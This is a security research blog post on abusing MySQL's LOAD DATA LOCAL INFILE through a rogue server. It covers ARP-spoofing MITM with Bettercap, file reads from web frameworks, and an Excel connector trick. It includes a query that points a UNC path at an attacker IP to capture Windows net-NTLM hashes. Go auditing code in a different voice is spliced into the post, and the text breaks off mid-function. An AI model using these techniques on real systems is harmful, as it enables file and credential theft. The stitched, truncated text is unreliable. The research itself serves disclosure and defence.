w00tsec: embedded device &amp; webapp hacking<br />
<br />
<b>Abusing MySQL LOCAL INFILE to read client files</b><br />
Bernardo Rodrigues, 2018-04-23<br />
<br />
Recently, I was playing the <a href="https://ctftime.org/event/539/tasks/">VolgaCTF 2018 CTF</a> with my teammates from <a href="https://twitter.com/thegooniesctf">TheGoonies</a> and we came across an interesting Web challenge that we didn't manage to solve during the competition. The following day, I read the <a href="https://github.com/balsn/ctf_writeup/tree/master/20180324-volgactf#corp-monitoring-unsolved-written-by-bookgin-special-thanks-to-admin-aleksey">write-up</a> and learned a cool technique to attack the MySQL client directly via the LOAD DATA INFILE statement.<br />
<br />
The "<a href="https://ctftime.org/task/5642">Corp Monitoring</a>" task consisted of a Corporate Monitoring API that would health-check a given server by connecting to it and verifying whether the FTP, Web and MySQL servers were up. The MySQL user for the connection was restricted and the healthcheck validation was based on a few queries, including the "SHOW DATABASE" command.<br />
<span style="text-align: center;"><br /></span>
<span style="text-align: center;">The key to solve the challenge was to identify the "Can Use LOAD DATA LOCAL" client capability and point the API to a Rogue MySQL server that would read arbitrary files from the client via LOAD DATA INFILE statements.</span><br />
<br />
After reading about the technique, I decided to check how several libraries, clients and Web Frameworks could be exploited. I also ended up writing a Bettercap module to abuse this feature in combination with MITM attacks.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFDtcMQHc7MqFy-KZX-CtVfVGWq_DvUwBlZUhVuzCw8o4xcO_M0ifx4F6K60rMTP2RikYJdDzWO5ip-V_I9XV3DByIGdOzGHqYrppL-dldJT3KqAP7xrX5TJWfKpEiNBP-WXqhwx7MqYoN/s1600/bettercap-mysql.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1114" data-original-width="1118" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFDtcMQHc7MqFy-KZX-CtVfVGWq_DvUwBlZUhVuzCw8o4xcO_M0ifx4F6K60rMTP2RikYJdDzWO5ip-V_I9XV3DByIGdOzGHqYrppL-dldJT3KqAP7xrX5TJWfKpEiNBP-WXqhwx7MqYoN/s320/bettercap-mysql.png" width="320" /></a></div>
<br />
<br />
<b style="text-align: center;">Previous Research</b><br />
<b style="text-align: center;"><br /></b>
Before I start I would like to point out that this technique is not new: it's a <a href="https://dev.mysql.com/doc/refman/5.7/en/load-data.html">known and documented feature</a> of the MySQL clients. I gathered prior posts, tools and presentations and they are all written by Russian authors; it looks like these techniques are not very widespread outside Russia.<br />
<br />
- <a href="https://www.slideshare.net/qqlan/database-honeypot-by-design-25195927">Database Honeypot by design</a> - Presentation from Yuri Goltsev (August 2013)<br />
- <a href="https://github.com/allyshka/Rogue-MySql-Server">Rogue-MySql-Server Tool</a>: MySQL fake server to read files of connected clients (September 2013)<br />
- <a href="http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/">MySQL connect file read</a> - Post from the Russian Security (April 2016)<br />
<br />
<br />
<b>Revisiting MySQL LOAD DATA INFILE</b><br />
<br />
According to the <a href="https://dev.mysql.com/doc/internals/en/connection-phase.html">MySQL documentation</a>, the handshake connection phase performs the following tasks:<br />
<br />
- Exchange the capabilities of client and server<br />
- Setup SSL communication channel if requested<br />
- Authenticate the client against the server<br />
<br />
After the successful authentication, the client sends the query and waits for the server response before actually doing something. The "Client Capabilities" packet includes an entry called "Can Use LOAD DATA LOCAL".<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMH3G-9-ndfNUJd8JLBZVjoV3PEDRPvgx4MGG0TlFQYAPgfItAC8nJ3hIhekJNyELoddlJdhgz3jG1M07m0m7F7t49YhCvIBEzGtsCVwsLjtg3P7YKskAMuW9bqSN9xGVDLbjHSr3T9imZ/s1600/conn.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1182" data-original-width="1386" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMH3G-9-ndfNUJd8JLBZVjoV3PEDRPvgx4MGG0TlFQYAPgfItAC8nJ3hIhekJNyELoddlJdhgz3jG1M07m0m7F7t49YhCvIBEzGtsCVwsLjtg3P7YKskAMuW9bqSN9xGVDLbjHSr3T9imZ/s400/conn.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">LOAD DATA LOCAL Set? You're gonna have a bad time.</td></tr>
</tbody></table>
<br />
This is where things start to become interesting. As long as the client enables the capability (via --enable-local-infile flag, for example), the file will be read from the local machine running the MySQL client and transferred to the server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNRL60s7xhk5JOqM8_V5vKlGXk1Vg-eOha81rZ31RQluDTb5xffZ7ORvp8pfxuCCTET-WfYOlvOkVIQYoMmg53NuUi6fs5SBbwLc0-BbcduZ2JbjjJAxMQQ2NZNhK7ErSU1vj4-qSCpoGR/s1600/Screen+Shot+2018-04-21+at+18.48.13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="666" data-original-width="1140" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNRL60s7xhk5JOqM8_V5vKlGXk1Vg-eOha81rZ31RQluDTb5xffZ7ORvp8pfxuCCTET-WfYOlvOkVIQYoMmg53NuUi6fs5SBbwLc0-BbcduZ2JbjjJAxMQQ2NZNhK7ErSU1vj4-qSCpoGR/s400/Screen+Shot+2018-04-21+at+18.48.13.png" width="400" /></a></div>
<br />
<div>
One particular property of the MySQL protocol is that the client does not keep track of the command it requested: it executes the next step purely based on the server's response.</div>
<div>
<br /></div>
<div>
This means that a rogue MySQL server can simulate the initial handshake, wait for the SQL statement packet, ignore it and respond with a LOCAL INFILE request, which asks the client to send a file. Cool isn't it?<br />
<br />
For successful exploitation we also need the client to make at least one query to our rogue MySQL server. Fortunately, most MySQL clients and libraries make at least one query after the handshake in order to fingerprint the platform, for example "select @@version_comment limit 1".</div>
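To make the handshake and the LOCAL INFILE request above concrete from the monitoring side, here is an added example (my own code, not the post's Bettercap module and not any MySQL library) that decodes the two packets that matter: the client's HandshakeResponse41, to see whether it advertises CLIENT_LOCAL_FILES ("Can Use LOAD DATA LOCAL") and CLIENT_SSL, and a server-to-client packet, to flag the 0xFB LOCAL INFILE request and the file name it carries. The capability values and packet layout are the documented protocol constants; the sample packets are constructed inline, and the user name, file name and function names are mine.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"errors"
	"fmt"
)

// Protocol constants (documented values from the MySQL client/server protocol).
const (
	ClientLocalFiles  uint32 = 0x00000080 // capability "Can Use LOAD DATA LOCAL"
	ClientProtocol41  uint32 = 0x00000200
	ClientSSL         uint32 = 0x00000800
	localInfileMarker byte   = 0xFB // LOCAL INFILE request: 0xFB, then the file name
)

// ClientHello is the part of a HandshakeResponse41 packet this check needs.
type ClientHello struct {
	Username   string
	LocalFiles bool // client will honour LOCAL INFILE requests
	SSL        bool // client asked to switch to TLS
}

// payloadOf strips the 4-byte packet header (3-byte little-endian length,
// 1-byte sequence id) and checks the length against what was captured.
func payloadOf(pkt []byte) ([]byte, error) {
	if len(pkt) < 4 {
		return nil, errors.New("packet shorter than header")
	}
	n := int(pkt[0]) | int(pkt[1])<<8 | int(pkt[2])<<16
	if len(pkt)-4 < n {
		return nil, fmt.Errorf("truncated packet: header says %d bytes, have %d", n, len(pkt)-4)
	}
	return pkt[4 : 4+n], nil
}

// ParseHandshakeResponse reads the capability flags and user name from the
// client's HandshakeResponse41 (the packet answering the server greeting):
// 4 bytes capabilities, 4 bytes max packet size, 1 byte charset, 23 reserved,
// then the NUL-terminated user name (the rest is ignored here).
func ParseHandshakeResponse(pkt []byte) (ClientHello, error) {
	payload, err := payloadOf(pkt)
	if err != nil {
		return ClientHello{}, err
	}
	if len(payload) < 32 {
		return ClientHello{}, errors.New("payload too short for HandshakeResponse41")
	}
	caps := binary.LittleEndian.Uint32(payload[0:4])
	if caps&ClientProtocol41 == 0 {
		return ClientHello{}, errors.New("client does not speak protocol 4.1")
	}
	end := bytes.IndexByte(payload[32:], 0)
	if end < 0 {
		return ClientHello{}, errors.New("user name not NUL-terminated")
	}
	return ClientHello{
		Username:   string(payload[32 : 32+end]),
		LocalFiles: caps&ClientLocalFiles != 0,
		SSL:        caps&ClientSSL != 0,
	}, nil
}

// IsLocalInfileRequest reports whether a server-to-client packet is a LOCAL
// INFILE request and, if so, which file the server asked the client to send.
func IsLocalInfileRequest(pkt []byte) (string, bool) {
	payload, err := payloadOf(pkt)
	if err != nil || len(payload) == 0 || payload[0] != localInfileMarker {
		return "", false
	}
	return string(payload[1:]), true
}

func framePacket(seq byte, payload []byte) []byte { // header + payload, for the samples
	n := len(payload)
	return append([]byte{byte(n), byte(n >> 8), byte(n >> 16), seq}, payload...)
}

// SampleHandshakeResponse is a constructed HandshakeResponse41 for user "app"
// with CLIENT_LOCAL_FILES set and CLIENT_SSL clear, i.e. a client that enables
// LOCAL INFILE and does not ask for TLS.
func SampleHandshakeResponse() []byte {
	p := make([]byte, 32) // fixed part; bytes 9..31 stay zero (reserved)
	binary.LittleEndian.PutUint32(p[0:4], ClientProtocol41|ClientLocalFiles)
	binary.LittleEndian.PutUint32(p[4:8], 1<<24) // max packet size
	p[8] = 0x21                                  // charset utf8_general_ci
	p = append(p, "app\x00"...)
	return framePacket(1, append(p, 0x00)) // empty auth response
}

// SampleInfileRequest is a constructed server packet naming the file to upload.
func SampleInfileRequest(name string) []byte {
	return framePacket(1, append([]byte{localInfileMarker}, name...))
}

func main() {
	hello, err := ParseHandshakeResponse(SampleHandshakeResponse())
	name, asked := IsLocalInfileRequest(SampleInfileRequest("client-config.ini"))
	fmt.Printf("client hello: %+v (err=%v); server requested %q: %v\n", hello, err, name, asked)
}
```

A sensor or proxy watching a MySQL session that sees LocalFiles set and SSL clear in the client hello, followed by a 0xFB packet naming a path outside the directory the application is expected to import from, is looking at exactly the sequence described above; the length check in payloadOf matters because a truncated capture must be rejected rather than misread.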
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic4tE86p5j2k8pcT7Iz5oYz0vmzcPx9QwLMgqpB1P8X68lr85C8aOa0DfZfv7-S2ulE8q1GWdrC39EDWOLGiNT-wW_TxqkSywsXzeqALNIHi0z7ApZfE7wfFNm-AxN1WTDpN3zxt6spQW-/s1600/Screen+Shot+2018-04-21+at+18.32.18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1156" data-original-width="1600" height="287" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic4tE86p5j2k8pcT7Iz5oYz0vmzcPx9QwLMgqpB1P8X68lr85C8aOa0DfZfv7-S2ulE8q1GWdrC39EDWOLGiNT-wW_TxqkSywsXzeqALNIHi0z7ApZfE7wfFNm-AxN1WTDpN3zxt6spQW-/s400/Screen+Shot+2018-04-21+at+18.32.18.png" width="400" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Because most MySQL clients don't enforce encryption, it's quite easy to impersonate a MySQL server using tools like <a href="https://github.com/bettercap/bettercap">Bettercap</a>. They simply don't care about the integrity and authenticity of the communication.<br />
<br />
<br />
<b>MITM + Bettercap + Rogue MySQL Server = WIN</b><br />
<br />
<a href="https://github.com/bettercap/bettercap">Bettercap</a> is the Swiss army knife for network attacks and monitoring. It supports <a href="https://github.com/bettercap/bettercap/tree/master/modules">several modules</a> for ARP/DNS spoofing, TCP and packet proxy etc. I had a quick look at how its modules work and hacked together a simple MySQL server that abuses the LOAD DATA LOCAL INFILE feature to read client files.<br />
<span style="text-align: center;"><br /></span>
<span style="text-align: center;">Firstly, I sniffed the MySQL traffic while a client connected and was asked by the server to read a LOCAL INFILE. I exported the server responses as byte arrays and defined the components in the Golang code:</span><br />
<span style="text-align: center;"><br /></span>
<span style="text-align: center;">
<script src="https://gist.github.com/bmaia/14e267c984fb88f0a5282d06a7f73e27.js"></script>
</span><br />
<span style="text-align: center;">Writing a module for Bettercap is very simple and the core of the Rogue MySQL server is as follows:</span><br />
<br />
<script src="https://gist.github.com/bmaia/adc503231ffff19a77aaf0c7abd2e895.js"></script>
Here's the module in action:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDNO6K1df5treOXKGjEwDGfTG_a5RL82aBwRaAzg68S2A24V2_K5h6bR7o4pj5NI3HrqMEudgiJqqsqyUQSTdvsIHeBg1MQsMtJGlJLOwGEaM_ExeMICs731-X5YOyebLJjPdw9Gygs9Zl/s1600/bettarcapz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1278" data-original-width="1586" height="514" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDNO6K1df5treOXKGjEwDGfTG_a5RL82aBwRaAzg68S2A24V2_K5h6bR7o4pj5NI3HrqMEudgiJqqsqyUQSTdvsIHeBg1MQsMtJGlJLOwGEaM_ExeMICs731-X5YOyebLJjPdw9Gygs9Zl/s640/bettarcapz.png" width="640" /></a></div>
<br />
<br />
The module includes the following options:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuz2gCfF3gXkAimBZ8-y7qLd8PbgskQzn1wqbZwPMy7Bjeu6yYTuU16FXPUOIFLTYcPU73gq26xclmuBVwI62lhs2_Nth3SSxSR4TW6K23iHpB_4l1HMf7aNZO6oz7I6J3lE_eQYVtScmf/s1600/Screen+Shot+2018-04-21+at+19.49.48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="598" data-original-width="1238" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuz2gCfF3gXkAimBZ8-y7qLd8PbgskQzn1wqbZwPMy7Bjeu6yYTuU16FXPUOIFLTYcPU73gq26xclmuBVwI62lhs2_Nth3SSxSR4TW6K23iHpB_4l1HMf7aNZO6oz7I6J3lE_eQYVtScmf/s640/Screen+Shot+2018-04-21+at+19.49.48.png" width="640" /></a></div>
<br />
<br />
It's worth mentioning that the INFILE format also supports UNC paths. If the client connecting to your rogue MySQL server is running on Windows, it's also possible to retrieve net-NTLM hashes, using the query below:<br />
<br />
<div class="code">
LOAD DATA LOCAL INFILE '\\\\172.16.136.153\\test' into table mysql.test FIELDS TERMINATED BY "\n";</div>
<br />
Here's a quick video illustrating this technique:<br />
<br />
<iframe allow="autoplay; encrypted-media" allowfullscreen="" frameborder="0" height="400" src="https://www.youtube.com/embed/3HVW-toqfCM" width="660"></iframe>
<br />
If you have a privileged network position and perform DNS or ARP spoofing, you can also redirect the MySQL traffic from legit databases to your rogue server and read arbitrary client files.<br />
<br />
As far as I know, it's not possible to simply redirect TCP traffic from Host A to Host B using Bettercap. I wrote a quick and dirty hack for <a href="https://github.com/bettercap/bettercap/blob/master/modules/tcp_proxy.go">tcp_proxy.go</a> to handle that:<br />
<br />
<script src="https://gist.github.com/bmaia/73f796e970e8eb9e7cd846620bba58b4.js"></script>
Here's the ARP spoofing and the MySQL LOAD DATA LOCAL INFILE in action:<br />
<br />
<iframe allow="autoplay; encrypted-media" allowfullscreen="" frameborder="0" height="400" src="https://www.youtube.com/embed/kHR5dd0qVG4" width="660"></iframe>
<br />
<br />
I sent a pull request to the project with the Rogue MySQL Server; let's hope that <a href="https://twitter.com/evilsocket">@evilsocket</a> accepts it. If my pull request is accepted, I will also ask them about the best way to redirect TCP traffic (maybe another module or a setting for the TCP Proxy). I will update the post with the upcoming official solution.<br />
<br />
<br />
<b>MySQL Command-Line Clients</b></div>
<div>
<b><br /></b></div>
<div>
The mysql client from Homebrew/macOS (mysql: stable 5.7.21, devel 8.0.4-rc) properly enforces the LOCAL-INFILE flag and won't let you read client files without explicitly enabling it:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_esnxfkpHGH0_0shiZbFXdXeQh9QOPq-Iki_HWRQtC4auDFA8Ub2J1JNd0LR4lZ_1lNWr7pwTKfOKoVjUhljpTBZv5gtigRFUDittb2Jqi6eU2S0UHVCVyS-imTSwZfu_q_qXs7OyAP1s/s1600/Screen+Shot+2018-04-21+at+18.57.46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="258" data-original-width="1140" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_esnxfkpHGH0_0shiZbFXdXeQh9QOPq-Iki_HWRQtC4auDFA8Ub2J1JNd0LR4lZ_1lNWr7pwTKfOKoVjUhljpTBZv5gtigRFUDittb2Jqi6eU2S0UHVCVyS-imTSwZfu_q_qXs7OyAP1s/s640/Screen+Shot+2018-04-21+at+18.57.46.png" width="640" /></a></div>
<div>
<br /></div>
<div>
For some reason, several clients, like the Ubuntu default mysql-client (5.7.21-0ubuntu0.17.10.1, as of this writing), set that flag automatically during the connection:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbKH0eHgkZo5EZ-ufeskVg6PpVKizYlnHBlznXNDi2XGVlkyyok_Svxgel1iGZD2ke_Svow0b474v1I8eM2fcPcop1Okpov4YU0LyQiCWql-jDE0KzRO9D3kupPHNoe6GT3aTty9aGZKrk/s1600/Screenshot+at+2018-04-21+19-02-33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="346" data-original-width="738" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbKH0eHgkZo5EZ-ufeskVg6PpVKizYlnHBlznXNDi2XGVlkyyok_Svxgel1iGZD2ke_Svow0b474v1I8eM2fcPcop1Okpov4YU0LyQiCWql-jDE0KzRO9D3kupPHNoe6GT3aTty9aGZKrk/s640/Screenshot+at+2018-04-21+19-02-33.png" width="640" /></a></div>
<div>
<br /></div>
<div>
The same happens with the Windows client bundled with MySQL Workbench; there is no need to enable any flag to read local files:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx2-7-GtCvwaw1BYB4idYeFmwib6oiXdhPjSlNCt72EHZ13teIdA_AW_zjhWbpOhTmzjBFGk2Vjb-VVAHus5Jgg9Uq1AhnKlzDHOi9Gjxeb3-s3addMI-wxwwhO7f2triuK9CLGMhRSkJ2/s1600/mysqlwin.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="342" data-original-width="677" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx2-7-GtCvwaw1BYB4idYeFmwib6oiXdhPjSlNCt72EHZ13teIdA_AW_zjhWbpOhTmzjBFGk2Vjb-VVAHus5Jgg9Uq1AhnKlzDHOi9Gjxeb3-s3addMI-wxwwhO7f2triuK9CLGMhRSkJ2/s640/mysqlwin.PNG" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<b>Abusing Web Frameworks to read server files</b><br />
<br />
<div>
This insecure-by-default behavior also occurs in several libraries, Frameworks and MySQL connectors out there: most of them enable the LOCAL-INFILE flag by default. In this case, when a Web user modifies a form containing a MySQL host and points it to a rogue server, he can read local files from the system running the Web application.<br />
<br />
This functionality is very common in Monitoring/Dashboard applications and Framework install scripts, which allow the user to set up the database on the fly via the admin panel.</div>
<div>
<br /></div>
The good news here is that most Web-applications restrict the panels for changing MySQL settings to administrator users only. The bad news is that your admin is one XSS/CSRF/Clickjacking away from being exploited. Here's a quick overview on how some PHP frameworks can be abused:<br />
<br />
<br />
<ul>
<li><b>Joomla v3.8.7</b></li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoA_3KmRTFI-QmzpQQf3dk6cGW6gLuRRNEDbf1MtfKzEBID1KmeRfaYec_I386rx66NprwVvQp8ZiOaOjhqn_CCiZcMIVDQ9dIKHPusWVvU40Flu9TBknTyWcp4lJTGytyWBP36zzfbsLp/s1600/joomla.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1069" data-original-width="1600" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoA_3KmRTFI-QmzpQQf3dk6cGW6gLuRRNEDbf1MtfKzEBID1KmeRfaYec_I386rx66NprwVvQp8ZiOaOjhqn_CCiZcMIVDQ9dIKHPusWVvU40Flu9TBknTyWcp4lJTGytyWBP36zzfbsLp/s640/joomla.png" width="640" /></a></div>
<br />
<br />
<ul>
<li><b>Wordpress v4.9.5</b></li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwMXCo0z8o5O7AtLbd-ib8xqHUhgn_aJfRTNJmTAfDwJcW0fjq5sj35VtbxG4JQqjU9CNWSTZ7I9flamt4BJPcEzza9HYBwgO7STu8wxx8q1R5Hwqjd0_U6lXeT9fnLDuT0W7bHpqJpoiy/s1600/wordpress.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="990" data-original-width="1600" height="394" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwMXCo0z8o5O7AtLbd-ib8xqHUhgn_aJfRTNJmTAfDwJcW0fjq5sj35VtbxG4JQqjU9CNWSTZ7I9flamt4BJPcEzza9HYBwgO7STu8wxx8q1R5Hwqjd0_U6lXeT9fnLDuT0W7bHpqJpoiy/s640/wordpress.png" width="640" /></a></div>
<br />
<br />
<ul>
<li><b>Zabbix v3.4.8</b></li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-15psH5tBQm6ekqkpJkXw4Jw8opKTAKc1_oqxneO24k2uJnxlzaZT5v46aVW_dDm1GPCg5viMdCi6Q4BtzG0jNNvllV70vhAR0YGA2mUK4P-p3JmWEZ4-AbjQ35OmM2Q6HCJJtboitD8H/s1600/zabbix.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1165" data-original-width="1600" height="466" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-15psH5tBQm6ekqkpJkXw4Jw8opKTAKc1_oqxneO24k2uJnxlzaZT5v46aVW_dDm1GPCg5viMdCi6Q4BtzG0jNNvllV70vhAR0YGA2mUK4P-p3JmWEZ4-AbjQ35OmM2Q6HCJJtboitD8H/s640/zabbix.png" width="640" /></a></div>
<div>
<br /></div>
<br />
<br />
<ul>
<li><b>Drupal v8.5.2 </b>(Not vulnerable)</li>
</ul>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiy5LsA_p5Q-IAxFWJJ1W-FoZvfEMJMYKgc8BwiFVNzqbBQ8ZL5CowWqKugfuIjinoKDNjwEZanKj0xMZKI8e7K_TOnskx9-GPMXUt3fY-_xw7Vo9cau7M80nNmbUcZ_KanARHzbOnUHEKw/s1600/drupal.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1143" data-original-width="1600" height="456" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiy5LsA_p5Q-IAxFWJJ1W-FoZvfEMJMYKgc8BwiFVNzqbBQ8ZL5CowWqKugfuIjinoKDNjwEZanKj0xMZKI8e7K_TOnskx9-GPMXUt3fY-_xw7Vo9cau7M80nNmbUcZ_KanARHzbOnUHEKw/s640/drupal.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Drupal was probably too busy being vulnerable to RCEs</td></tr>
</tbody></table>
<br />
<br />
<b>Bonus: Abusing Excel MySQL Connector</b><br />
<br />
If you have a Microsoft Office installation on your Windows machine and the <a href="https://dev.mysql.com/downloads/connector/net/">MySQL Connector/Net</a> is installed, it's possible to create a spreadsheet that connects to a rogue MySQL server. The connector is installed by default with the <a href="https://dev.mysql.com/downloads/installer/">Windows MySQL installer</a> and you probably have it if you use a tool to connect/manage MySQL databases or if your machine is running MySQL server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSjUNpqbJeWtd3VVKDqDQkX3ThOIH961LDS68pTRF1-KXdW9khpSWhutJkB-YqUx3Nh9CbXGo1_1ToK4iVM7_PlVl5pbnQuZbtIMV68qPMIoIFKz1Hkc6l9cxnaaZmrpww6QUO-nVyOQse/s1600/mysql-install.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="599" data-original-width="800" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSjUNpqbJeWtd3VVKDqDQkX3ThOIH961LDS68pTRF1-KXdW9khpSWhutJkB-YqUx3Nh9CbXGo1_1ToK4iVM7_PlVl5pbnQuZbtIMV68qPMIoIFKz1Hkc6l9cxnaaZmrpww6QUO-nVyOQse/s400/mysql-install.PNG" width="400" /></a></div>
<br />
In order to create a document that connects to a MySQL server, we need to go to the Data tab, choose New Query>From Database>From MySQL Database. We enter the server details, username, password, query and save the file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQHf-oc-VdgYh2yN-dFeYHJTAik_WJit7cJgyA4RnsXaeKYDxKdCkKernNUN1MWTyhWvcsbZq7_d681oOqxLeYN2XHmgggPPrBGQgv752cu2hAZ0_zAAThmeh2vOeMzQB8lnFmKq0J7bMI/s1600/mysql-excel.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1013" data-original-width="1022" height="395" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQHf-oc-VdgYh2yN-dFeYHJTAik_WJit7cJgyA4RnsXaeKYDxKdCkKernNUN1MWTyhWvcsbZq7_d681oOqxLeYN2XHmgggPPrBGQgv752cu2hAZ0_zAAThmeh2vOeMzQB8lnFmKq0J7bMI/s400/mysql-excel.png" width="400" /></a></div>
<br />
<br />
If you download the document from the Internet, the receiver needs to put the document in editing mode before the remote server will be contacted. For some reason, we need to close and reopen Excel for the query to work. Also, Excel only displays the security warning the first time you open the file and stops doing so as soon as you enable the external content.<br />
<br />
Here's another demo:<br />
<br />
<iframe allow="autoplay; encrypted-media" allowfullscreen="" frameborder="0" height="400" src="https://www.youtube.com/embed/iBGbHYJAXSg" width="660"></iframe>
<br />
<br />
<b><br /></b>
<b>Conclusion</b><br />
<br />
Despite the efforts from Duo Security (they had a website AND a logo) with the <a href="https://duo.com/blog/backronym-mysql-vulnerability">BACKRONYM MySQL vulnerability</a>, not much is being done to enforce proper encryption for MySQL connections. Web applications and Frameworks rarely support encryption and TLS validation for the MySQL connection. The unencrypted protocol is not secure and, given a password hash and a successful authentication handshake, one can <a href="https://github.com/cyrus-and/mysql-unsha1">successfully log in to the server</a>.<br />
<br />
MySQL libraries and connectors should establish secure patterns and disable LOCAL-INFILE support by default. I really like the way the <a href="https://github.com/go-sql-driver/mysql">Go MySQL Driver</a> works: it supports LOCAL-INFILE via whitelisting and the library documentation explicitly advises that the feature "Might be insecure!"<br />
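As an added example (my own code, not the driver's) of what the whitelisting approach looks like when you audit it: a small check that parses a go-sql-driver/mysql style DSN and flags the two settings this post is about, allowAllFiles=true (the driver's documented opt-in to LOAD DATA LOCAL INFILE for any path, as opposed to only files registered through RegisterLocalFile) and the tls parameter (true, false, skip-verify or preferred). The DSN format and parameter names are the driver's documented ones; the parser, the severity labels, the loopback heuristic and the sample DSNs (placeholder hosts and credentials) are mine.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// DSN holds the parts of a go-sql-driver/mysql style DSN the audit looks at.
// Documented format: [user[:password]@][protocol[(address)]]/dbname[?param=value&...]
type DSN struct {
	User, Protocol, Address, DBName string
	Params                          map[string]string
}

// ParseDSN is this example's own minimal parser for the format above (not the
// driver's mysql.ParseDSN); it handles the common shape and no escaping.
func ParseDSN(dsn string) (DSN, error) {
	d := DSN{Params: map[string]string{}}
	parts := strings.SplitN(dsn, "?", 2)
	head := parts[0]
	slash := strings.LastIndex(head, "/")
	if slash < 0 {
		return d, fmt.Errorf("missing '/' before database name in %q", dsn)
	}
	d.DBName = head[slash+1:]
	conn := head[:slash]
	if at := strings.LastIndex(conn, "@"); at >= 0 {
		d.User = strings.SplitN(conn[:at], ":", 2)[0]
		conn = conn[at+1:]
	}
	if open := strings.Index(conn, "("); open >= 0 && strings.HasSuffix(conn, ")") {
		d.Protocol, d.Address = conn[:open], conn[open+1:len(conn)-1]
	} else {
		d.Protocol = conn
	}
	if len(parts) == 2 {
		vals, err := url.ParseQuery(parts[1])
		if err != nil {
			return d, err
		}
		for k, v := range vals {
			d.Params[k] = v[len(v)-1] // last value wins, as a simple rule
		}
	}
	return d, nil
}

// Finding is one audit result: a severity label and the reason.
type Finding struct{ Severity, Message string }

// Audit flags allowAllFiles=true (LOCAL INFILE open to any path the process
// can read) and a tls setting that leaves the transport unencrypted,
// unverified or downgradable. Loopback and unix-socket connections are not
// flagged for missing TLS, since they never cross the network.
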